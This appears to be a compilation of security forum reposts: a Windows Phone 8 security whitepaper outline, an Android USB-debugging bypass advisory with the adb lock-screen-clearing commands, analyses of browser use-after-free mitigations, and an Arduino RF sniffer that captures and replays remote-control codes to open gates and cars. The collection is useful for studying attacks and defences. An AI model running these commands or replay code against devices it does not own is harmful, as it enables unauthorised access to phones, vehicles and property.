Au lansat patch-ul: Security Patch Release for vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1, and 5.1.2 - vBulletin Community Forum
-
Windows Phone 8 Application Security Whitepaper Syscan 2014 Singapore – Alex Plaskett and Nick Walker 2014/03/30 Contents 1. Introduction ..................................................................................... 4 2. Background ...................................................................................... 4 2.1 Application Overview ..................................................................................... 4 2.2 Code Signing ................................................................................................ 5 2.3 Sandboxing.................................................................................................. 5 2.4 Exploit Mitigation .......................................................................................... 7 2.5 Encryption .................................................................................................. 7 2.6 Secure Boot ................................................................................................. 8 2.7 Developer Unlock .......................................................................................... 8 2.8 Previous Work .............................................................................................. 9 3. Black box Assessment ......................................................................... 10 3.1 Obtaining Marketplace Applications .................................................................. 10 3.2 Application Structure ................................................................................... 11 3.3 Decompiling Marketplace Applications ............................................................... 12 3.4 Patching Marketplace Applications ................................................................... 12 3.5 Obtaining a remote shell ............................................................................... 13 3.6 Building Standalone Executables ...................................................................... 14 4. Local Data Protection ......................................................................... 16 4.1 Insecure Data Storage................................................................................... 17 4.2 Data Protection API (DPAPI) ........................................................................... 20 4.3 Local Database Security ................................................................................ 24 5. Transmission Security ......................................................................... 26 5.1 Traffic Interception ..................................................................................... 26 5.2 Cipher Support and Certificate Validation .......................................................... 27 6. Interprocess Communication ................................................................. 29 6.1 File and Protocol Handlers ............................................................................. 29 6.2 Cross Application Navigation Forgery ................................................................ 33 mwrinfosecurity.com | © MWR InfoSecurity 3 7. Input Validation ................................................................................ 37 7.1 Web Browser Control ................................................................................... 37 7.2 Cross Site Scripting (XSS) ............................................................................... 38 7.3 SQL Injection ............................................................................................. 40 7.4 XAML Injection ........................................................................................... 40 7.5 JavaScript Bridge Security ............................................................................. 41 8. Backgrounding and Application State ....................................................... 42 9. Push Notifications .............................................................................. 45 10. Application Logging .......................................................................... 48 11. C++/WinRT Native Code ..................................................................... 48 12. Samsung ATIV S ............................................................................... 49 12.1 Registry Access ......................................................................................... 49 12.2 File System Access ..................................................................................... 49 12.3 Enable All Side Loading / Bootstrap Samsung ..................................................... 50 13. Conclusions .................................................................................... 51 14. Acknowledgements ........................................................................... 52 15. References ..................................................................................... 52 Download: https://labs.mwrinfosecurity.com/system/assets/651/original/mwri_wp8_appsec-whitepaper-syscan_2014-03-30.pdf
-
Android 4.4.2 Secure USB Debugging Bypass A vulnerability found in Android 4.2.2-4.4.2 allowed attackers to bypass Android’s secure USB debugging, this allowed attackers to access adb prior to unlocking the device. Software Android Affected Versions Android 4.2.2-4.4.2 CVE Reference Authors Henry Hoggard, MWR Labs (https://labs.mwrinfosecurity.com)SeverityMediumVendorGoogleVendor Response Fixed in Android 4.4.3 Description: Android Developer Bridge (adb) is a command line tool that allows users to communicate with and debug the device. It gives users permissions to access many areas of the device, including the ability to manage apps, access device logs, read device input, take backups and execute OS commands. In Android 4.2.2, Google implemented Secure USB Debugging, aimed to prevent adb from being connected to malicious computers. The user has to authorize a computer before it can connect with adb. The idea is that users can only authorize a computer after entering the password and unlocking the device. The bug detailed is only exploitable when adb is enabled on the device. Impact: If adb is enabled on the device, attackers with physical access to a device can bypass Android’s secure USB debugging protection. This allows attackers to gain adb access to the device, which would allow them to: • Install/uninstall applications • Bypass the lock screen • Access a high privilege shell on the device • Steal data from applications and settings on the device Cause: The adb authorize host confirmation dialog is displayed prior to unlocking the device on the emergency dialer and lock screen camera. This allows attackers with physical access to authorize their computer and connect with adb. Interim Workaround: If you are running a vulnerable version of Android, it is recommended to disable ADB to prevent this attack. Solution: Android 4.4.3 prevents the adb authorization confirmation dialog from being opened in the emergency dialer and lock screen camera prior to unlocking the device. Users can now only authorize a computer with ADB after the lock screen stage is passed. Therefore it is recommended that a strong device password is used. Technical details: The intended design of secure USB debugging, is that the user needs to be unlock the device to be able to authorize new adb hosts. If the user attempts to use adb while still at the Android lock screen, it will throw the following error: error: device unauthorized. Please check the confirmation dialog on your device MWR discovered that by navigating to either the emergency dialer or the lock screen camera, then typing the below commands, it was possible to trigger confirmation dialog, the attacker could then accept this dialog and gain adb access to the device without knowing the device password. $ adb kill-server $ adb shell After gaining adb access to the device, to bypass the lock screen the following command is used: $ adb shell pm clear com.android.keyguard The below image shows the USB confirmation dialog displayed on the emergency dialer. Detailed Timeline: [TABLE] [TR] [TD] Date[/TD] [TD] Summary[/TD] [/TR] [TR] [TD] 26/02/2014[/TD] [TD] Reported to Google[/TD] [/TR] [TR] [TD] 27/02/2014[/TD] [TD] Google start investigating issue[/TD] [/TR] [TR] [TD] 29/04/2014[/TD] [TD] Google replied stating that a patch has been created[/TD] [/TR] [TR] [TD] 04/06/2014[/TD] [TD] Android 4.4.3 officially released containing patch[/TD] [/TR] [/TABLE] Sursa: https://labs.mwrinfosecurity.com/advisories/2014/07/03/android-4-4-2-secure-usb-debugging-bypass/
-
Isolated Heap & Friends - Object Allocation Hardening in Web Browsers In a recent Microsoft Patch Tuesday, Internet Explorer recently introduced a new heap protection aimed at making the exploitation of use-after-free vulnerabilities more difficult. This blog post details the protection, how it works, and how it compares to similar protections present in Mozilla Firefox and Google Chrome. Many people noted the huge amount of fixes for Internet Explorer vulnerabilities (59 in total) in the recent Microsoft Patch Tuesday release. Even more interesting is the addition of a new exploitation mitigation feature in IE, the Isolated Heap for DOM objects. This feature aims to harden the browser against the exploitation of use-after-free (UAF) vulnerabilities, as well as some other memory corruption bug classes. Chrome and Firefox deploy similar mitigations which we will discuss and later in this blog post. First, let’s have a look at the generic pattern of exploiting use-after-free vulnerabilities and the new Isolated Heap protection in Internet Explorer. Exploiting use-after-free vulnerabilities Due to the way heaps typically work, recently freed chunks of memory are preferred for fulfilling requests for similarly sized allocations, in order to prevent fragmentation of the heap and make optimal use of CPU cache behaviour. An attacker trying to exploit a use-after-free vulnerability reliably will likely try to allocate controlled data in place of the recently freed object. Typically, this controlled data is either a arbitrarily controllable type (such as a string or ArrayBuffer), or an object of a different type to the one that has been freed (replacing the object with one of the same type has limited worth from an exploitation point of view). The Isolated Heap in Internet Explorer Most of the DOM objects and supporting objects are now allocated on a separate heap. This will prevent an attacker from easily allocating arbitrary data in the space of a freed DOM object. The separate heap is allocated during the initialisation phase of mshtml.dll: ; START OF FUNCTION CHUNK FOR __DllMainStartup@12 loc_63C94EA9: ; dwMaximumSize push 0 push 0 ; dwInitialSize push 0 ; flOptions call ds:__imp__HeapCreate@12 ; HeapCreate(x,x,x) mov _g_hIsolatedHeap, eax The handle to the newly created heap is stored in a global variable. A call is made to the HeapSetInformation_LowFragmentation_Downlevel function, which will forcefully enable the Low Fragmentation Heap for this newly created heap. By following the references to the global variable, it is straight-forward to track down the allocation functions for the Isolated Heap: _MemIsolatedAlloc _MemIsolatedAllocClear The “Clear” variant will call HeapAlloc with the HEAP_ZERO_MEMORY flag set, which will zero all allocated memory before returning the newly allocated buffer. This is presumably done in order to prevent the exploitation of uninitialised memory vulnerabilities. Interestingly this is not done for all objects, only the following object types are being allocated by the non-zeroing variant: CDOMTextNode CTextNodeMarkupPointer CMarkupPointer CTraversalNodeIterator CDomRange The list of objects allocated by the zeroing variant is much larger and too long to list here, as it includes all HTML and SVG DOM Elements and supporting Element such as CTreeNode, CMarkup, CAttribute and others. Effectiveness The most obvious shortcoming of this implementation is that the protection is only restricted to a subset of objects in the browser. However, it is an improvement as the chosen subset includes many of the objects which are complex, and prone to UAF conditions as a result. Using the standard heap implementation (as opposed to a separate heap implementation) to try to prevent the exploitation of use-after-free vulnerabilities in a browser has also a few problems. Compared to the protections in other browsers, it should be fairly easy for an attacker to allocate objects of a different type over a freed object, especially when heap chunks are coalesced. When the zeroing variant of the allocation function is used, the protection against uninitialised memory vulnerabilities appears to be effective for the subset of protected objects. However, a number of other objects exist that are unprotected or allocated without first zeroing the memory, and these objects may still be partially uninitialised. Without a doubt the sudden introduction of this new mitigation technique on a Patch Tuesday will impact on actively exploited in-the-wild vulnerabilities, and at the very least will provide some headaches for attackers. Presentation Arena and Frame Poisoning in Mozilla Firefox Ever since the fork from Netscape, Firefox has used arena allocations for certain object types to recycle common object sizes and improve allocation efficiency. While this was initially done for performance reasons, it has some security benefits as well. In 2009, Mozilla added a protection called Frame Poisoning for some frame object allocations which were being heavily used during the page layout phase. Every object that is being freed will be replaced with a chosen pattern, making it easier to spot existing use-after-free vulnerabilities through use of the poisoned value (see here for an example). The current implementation can be found in the nsPresArena, and supports three types of allocations: By object ID By frame ID By size A separate free list is maintained for every object, frame ID and size allocation. During the lifetime of a presentation shell, a certain object or frame type will always be guaranteed to be allocated in a space that will only ever be filled with an object of the same type, or a poison value. This will prevent an attack from filling a freed object’s memory with arbitrary values. Effectiveness While this protection is effective for frame object allocation, many other object types in Firefox are not protected in a similar way (e.g. DOM objects). Which still allows attacker to exploit use-after-free vulnerabilities for object types which are not protected. PartitionAlloc in Google Chrome Chrome uses Blink (a forked version of WebKit) as its rendering engine. One of the security features added to Blink since the fork from WebKit is a separate heap allocator called PartitionAlloc. PartitionAlloc separates allocations on its heap into partitions, depending on the type of objects that will be allocated within that partition. At present, there are four partitions: ObjectModelPartition – This stores all objects which are subclasses of the Node class. This roughly equates to almost all objects from the DOM tree. RenderingPartion – This stores all objects within the render tree. To understand how these objects relate to the DOM tree, is a good talk by Eric Seidel from Google on the subject. BufferPartition – This stores objects from the Web Template Framework (the sometimes aptly named WTF). This includes many of the JavaScript native types, such as ArrayBuffer (typed and untyped) and StringImpl. “General Partition” – This stores all allocations served by WTF::fastMalloc (when the use of the system malloc is not specified). Within each partition, allocations are further separated into buckets based on the size of the allocation. Separating allocations by size hopes to limit an attacker’s options for different objects that can be reliably allocated in place of the freed object. For example, let’s say that an attacker has triggered the free of a DOM object that occupied an 176-byte chunk of memory on the heap. As discussed earlier in this post, prior to PartitionAlloc an attacker would have a number of options for allocations in place of the freed object. However, with PartitionAlloc, an attacker would be limited to allocating an object from the same partition (the ObjectModelPartition in this case) and of roughly the same size (176 bytes). Effectiveness The worst case for this limitation is that a number of objects exist which fill these criteria (this can happen when the memory footprint of the freed object is the same size as a generic base class, such as HTMLElement), however there is still a smaller subset of candidate objects available to an attacker. In addition, replacing the freed object with a different object will either result in replacing the vtable pointer of the freed object with a similar one, or with a freelist pointer (depending on whether the replacement object is in use or free). In either case, the most flexible option (from the point of view of an attacker) would be replacing the memory with objects where the data is controlled completely (such as a Uint8Array). As these objects are allocated outside of the current PartitionRoot, this is not possible. The best case scenario is that there is only one object which fulfills these criteria, and as a result it is only possible to replace the freed object with another object of the same type. This makes exploitation significantly more challenging, but not impossible (the newly allocated object may have a different state, or reference memory left over from the previous object which may now also be free). Sursa: https://labs.mwrinfosecurity.com/blog/2014/06/20/isolated-heap-friends---object-allocation-hardening-in-web-browsers/
-
Is use-after-free exploitation dead? The new IE memory protector will tell you by Zhenhua 'Eric' Liu | July 16, 2014 The Isolated Heap for DOM objects included in the Microsoft Patch Tuesday for June 2014 was just a fire drill aimed at making the exploitation of use-after-free (UAF) vulnerabilities more difficult. The patch for July 2014, however, has been quite a shock to exploit developers! In this release, Microsoft showed some determination in fighting back against UAF bugs with this improvement - the introduction of a new memory protector in Microsoft Internet Explorer, which would make exploitation of UAF vulnerabilities extremely difficult. An Overview Of The Changes In the July 2014 update, a total of fourteen MSHTML!MemoryProtection: functions and one global variable have been added to improve memory freeing of HTML and DOM elements. Figure 1. The MemoryProtection functions. In this update, we can also see that significant changes are made in the deconstructor of most elements: The HeapFree function has been replaced with MemoryProtection::CMemoryProtector::ProtectedFree. The HeapFree function has been replaced with ProcessHeapFree (a fastcall version of MemoryProtection::CMemoryProtector::ProtectedFree). Some deconstructors just implement the same mechanism of using MemoryProtection::CMemoryProtector::ProtectedFree directly. Figure 2. The ProtectedFree functions that have replaced HeapFree. How do these new functions work? And how do these changes stop the exploitation of use-after-free bugs and other kinds of exploits? The following technical analysis will tell you. Technical Analysis Memory allocations typically reference similarly-sized chunks of memory that have been previously freed. Taking advantage of this behavior, the traditional way of exploiting a use-after-free bug consists of the following process: 1) The program allocates and then later frees object A. 2) The attacker allocates object B over the freed memory, carefully controlling the data that will be used later. 3) The program uses freed object A, referencing the attacker-controlled data. The most effective mitigation should be in making Step 2 above, the replacement of an object, become harder or even impossible. There are some ways that the defender can do this: A) The ultimate way is to use a type-safe memory management system which would prevent the attacker from reclaiming the freed memory using a different type of object. The attacker could only replace the memory using the same type of object, which does not help at all in exploitation. The cheaper way is to do some tricks in the current memory management system to make the memory allocation and freeing behavior out of the attacker’s control. Specifically, the method in B is the improvement that we have seen in IE in June 2014, where an isolated heap in the memory allocate method has been added; and in July 2014, where the protected free method has been implemented. The isolated heap that was introduced could bring some trouble to attackers, but if the mitigation only relies on this, it should still be fairly easy to bypass; an attacker could still reference the freed objects with a different type, especially when the chunks of memory have been merged. The story has changed with the newly added protected free method in the July 2014 update. In each thread of an IE process, a MemoryProtector structure has been introduced to protect the current thread, as its name implies. Figure 3. The MemoryProtector structure. The BlockArray in this structure stores the size and address of the elements to be freed. The new function MemoryProtection::CMemoryProtector::ProtectedFree then makes use of the MemoryProtector structure to make freeing of the elements’ memory safer. Figure 4. The MemoryProtection::CMemoryProtector::ProtectedFree function. Generally speaking, this function that is responsible for freeing the protected memory acts like a simple conservative garbage collector. Instead of releasing the unused space immediately which could allow attackers to have a chance to re-allocate the space, MemoryProtection::CMemoryProtector::ProtectedFree first holds these unused spaces (filling the content with zeroes) until the number or total size meets a specific threshold. When this threshold is met, it does not release every stored element’s memory at that moment just yet as it still needs to implement a “Mark and Sweep” process. In Figure 4, this can be seen in the calls to MarkBlocks and ReclaimUnmarkedBlocks. The following shows the marking process which scans and marks every element that is still being referenced in the stack; these marked elements will not be freed in the sweeping process. By doing this, the possible use of a freed object in the stack would be prevented. Figure 5. The MemoryProtection::CMemoryProtector::MarkBlocks function. Eventually, the non-marked elements are freed in the sweeping process. Figure 6. The MemoryProtection::CMemoryProtector::ReclaimUnmarkedBlocks function. Now, let’s switch our point-of-view to the attacker’s side. To exploit a use-after-free bug under the above new conditions, we first need to find a controlled allocation method in the same heap as the freed object. We then need to predict the memory status (how many frees are still needed before triggering the actual free) when freeing an object. After that, we need to perfectly build the release sequence to make sure that the previously freed object’s space has actually been freed. That already sounds difficult, but that’s not all. We also have to predict the possible memory coalesces and handle the conflicts from other unknown allocations, and then reclaim the memory at a good timing. After all of that, we might then be able to take control of the previously freed element’s space. At this time, I’m afraid that most attackers who are trying to exploit use-after-free bugs have given up already. Further Thoughts As we can see in the beginning of the function MemoryProtection::CMemoryProtector::ProtectedFree in Figure 4, if the variable MemoryProtection::CMemoryProtector::tlsSlotForInstanc is equal to -1 or if TlsGetValue() fails, the old function HeapFree is directly called, but this is obviously tough to achieve. Some heap manipulation techniques would be affected by the joint action of the isolated heap and protected free because such techniques need to free some elements to make holes for the vulnerable buffer. The delayed free mechanism should bring some headache to attackers, but manipulation is not impossible, as long as attackers could find a controlled allocation method in the same heap and are able to free a reasonable amount of elements. Would the simple conservative garbage collector introduce a new attacking surface, such as the classic ASLR bypass by Dion? It’s possible to place an integer value into the stack and then brute-guess the address of the elements that are to be freed. However, even if an attacker could guess this address, one still cannot get a useful pointer such as the vftable that would leak a base DLL address due to the fact that the contents of the memory have already been zeroed out. In conclusion, building a reliable use-after-free exploit in IE is extremely difficult now. Well done, MSRC guys! Special Contribution by Margarette Joven by Zhenhua 'Eric' Liu | July 16, 2014 Sursa: Fortinet Blog | News and Threat Research Is use-after-free exploitation dead? The new IE memory protector will tell you
-
RF Sniffer – open gates, cars, and RF remote controlled devices with ease. The more I get to play with hardware, the more I get to see how security is lacking or implemented poorly (and I’m being very polite here). This time, I would like to share my 315mhz/434mhz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device. TIP – The size of the antenna is VERY important. Don’t neglect it – use the right length and use a wave calculator for future reference. The story I wanted to see how easy it is to open a keyless car using an Arduino. And then I wanted to simultaneously control multiple appliances operating on different frequencies (315Mhz/434Mhz). Using the following design, you can easily make a fuzzer to randomly open/close/control all kind of RF receivers out-there. You have been warned. Current version of the sniffer will resend whatever it sniffs 10 times. Behavior is easily changeable. I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished. Shopping List [TABLE] [TR] [TH]Amount[/TH] [TH]Part Type[/TH] [TH]Properties[/TH] [/TR] [TR] [TD]2[/TD] [TD]Inductor[/TD] [TD=class: props]wire antenna[/TD] [/TR] [TR] [TD]1[/TD] [TD]Red LED – 5mm[/TD] [TD=class: props]package 5 mm [THT]; leg yes; color Red (633nm)[/TD] [/TR] [TR] [TD]1[/TD] [TD]Arduino Uno (Rev3)[/TD] [TD=class: props]type Arduino UNO (Rev3)[/TD] [/TR] [TR] [TD]1[/TD] [TD]315Mhz RF-LINK_RX[/TD] [TD=class: props]package rf-link_rx; part # WRL-10533[/TD] [/TR] [TR] [TD]1[/TD] [TD]434Mhz RF-LINK_RX[/TD] [TD=class: props]package rf-link_rx; part # WRL-10532[/TD] [/TR] [TR] [TD]1[/TD] [TD]315Mhz RF-LINK_TX[/TD] [TD=class: props]package rf-link_tx; part # WRL-10535[/TD] [/TR] [TR] [TD]1[/TD] [TD]434Mhz RF-LINK_TX[/TD] [TD=class: props]package rf-link_tx; part # WRL-10534[/TD] [/TR] [/TABLE] Scheme We connect both receivers/transmitters like the following: Code And here is the Arduino code. Use at your own risk. /* * RF Sniffer © Elia Yehuda 2014 * * This program was coded. * * No warranty whatsoever. * Using this program will cause something, most likely problems. * */ #include <RCSwitch.h> // number of times to resend sniffed value. use 0 to disable. #define RESEND_SNIFFED_VALUES 10 // ye, thats the led pin # #define LED_PIN 13 // class for 315 receiver & transmitter RCSwitch rf315Switch = RCSwitch(); // class for 434 receiver & transmitter RCSwitch rf434Switch = RCSwitch(); void setup() { // print fast to console Serial.begin(115200); // 315 receiver on interrupt #0 (pin #2) rf315Switch.enableReceive(0); // 315 transmitter on pin #4 rf315Switch.enableTransmit(4); // how many resends rf315Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES); // 434 receiver on interrupt #1 (pin #3) rf434Switch.enableReceive(1); // 434 transmitter on pin #5 rf434Switch.enableTransmit(5); // how many resends rf434Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES); Serial.println("[+] Listening"); } // simple decimal-to-binary-ascii procedure char *tobin32(unsigned long x) { static char b[33]; b[32] = '\0'; for ( int z = 0; z < 32; z++) { b[31 - z] = ((x >> z) & 0x1) ? '1' : '0'; } return b; } void process_rf_value(RCSwitch rfswitch, int rf) { char str[120]; unsigned long value; // flash a light to show transmission digitalWrite(LED_PIN, true); value = rfswitch.getReceivedValue(); if (value) { sprintf(str, "[+] %d Received: %s / %010lu / %02d bit / Protocol = %d", rf, tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol() ); } else { sprintf(str, "[-] %d Received: Unknown encoding (0)", rf); } Serial.println(str); // resend the sniffed value (RESEND_SNIFFED_VALUES times) rfswitch.send(value, rfswitch.getReceivedBitlength()); // reset the switch to allow more data to come rfswitch.resetAvailable(); // stop light to show end of transmission digitalWrite(LED_PIN, false); } void loop() { if (rf315Switch.available()) { process_rf_value(rf315Switch, 315); } if (rf434Switch.available()) { process_rf_value(rf434Switch, 434); } } Sursa: RF Sniffer – open gates, cars, and RF remote controlled devices with ease. | Ziggy's of the world